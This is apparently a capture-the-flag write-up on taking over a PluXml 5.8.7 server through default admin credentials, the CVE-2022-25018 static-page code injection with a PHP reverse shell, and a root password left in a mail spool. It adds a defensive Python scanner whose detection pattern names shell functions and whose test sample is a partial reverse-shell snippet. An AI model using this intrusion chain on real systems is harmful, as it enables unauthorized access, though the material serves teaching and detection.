Enumeration

Nmap

An initial nmap scan revealed that the SSH and HTTP ports were open.


Web Enumeration

The website was running PluXml. To identify the version, I brute-forced endpoints with the versioning_metafiles.txt wordlist and found a README.md file.


It was PluXml 5.8.7.


Then I searched for the login page and found it at the /core/admin endpoint.


Then I tried the admin:admin credentials, and they worked.


Exploitation

CVE-2022-25018

PluXml v5.8.7 was discovered to allow attackers to execute arbitrary code via crafted PHP code inserted into static pages.

Some research revealed that this version is vulnerable and allows RCE. I then found the MoritzHuppert/CVE-2022-25018 repository, which explains how the vulnerability can be exploited.


So I simply edited a static page and inserted pentestmonkey/php-reverse-shell into it, after updating the IP value.


Visiting the static page then gave me a reverse shell as www-data.


Then I read the local flag inside the /var/www folder.

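As an added defender-side example (not code from the original write-up or from the PluXml project): a small Python checker that scans a PluXml static-pages directory for PHP tags and shell primitives of the kind that get planted through this vector, since static pages are supposed to hold plain HTML. The sample page bodies and the directory path are constructed assumptions.

```python
import re
from pathlib import Path
from typing import Dict, List

# Markers of executable code inside what should be static HTML. The call list
# is a starting point for this vector, not an exhaustive web-shell signature set.
PHP_TAG = re.compile(r"<\?(php|=)", re.IGNORECASE)
SUSPICIOUS_CALLS = re.compile(
    r"\b(fsockopen|proc_open|popen|shell_exec|exec|system|passthru|eval)\s*\(",
    re.IGNORECASE,
)


def scan_static_page(content: str) -> List[str]:
    """Return findings for one static-page body; an empty list means clean."""
    findings = []
    if PHP_TAG.search(content):
        findings.append("php-tag")
    calls = {m.group(1).lower() for m in SUSPICIOUS_CALLS.finditer(content)}
    findings.extend(sorted(calls))
    return findings


def scan_directory(directory: Path) -> Dict[str, List[str]]:
    """Scan every file under the static-pages directory; map path -> findings."""
    report: Dict[str, List[str]] = {}
    for path in sorted(directory.rglob("*")):
        if path.is_file():
            findings = scan_static_page(path.read_text(errors="replace"))
            if findings:
                report[str(path)] = findings
    return report


# Constructed samples (assumed, not taken from any real site): a benign page and
# a page carrying an incomplete reverse-shell skeleton of the kind described above.
BENIGN_PAGE = "<h1>About</h1><p>Mail us at <a href='mailto:x@example.invalid'>x</a></p>"
TAMPERED_PAGE = (
    "<h1>About</h1>\n"
    "<?php $sock = fsockopen('LISTENER_IP', 4444); /* ... */ "
    "proc_open('/bin/sh', /* ... */); ?>"
)

if __name__ == "__main__":
    for name, body in (("benign", BENIGN_PAGE), ("tampered", TAMPERED_PAGE)):
        print(name, scan_static_page(body) or "clean")
    # Against a real install (directory is an assumption; adjust for your deployment):
    # print(scan_directory(Path("/var/www/html/data/statiques")))
```

Run it periodically or from a file-integrity hook; any static page that reports "php-tag" or a shell primitive deserves a manual look and a comparison against the last known-good copy.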

Privilege Escalation

Mail (/var/spool/mail)

I checked the SUID binaries and found the exim4 binary, which is a mail client.


Then I checked its version with exim4 -bV; searching for that version online showed it was not vulnerable.


Later, I checked the /var/spool/mail directory and found a mail record for www-data. I read it, and it contained the root password.


With it, I simply obtained a root shell.
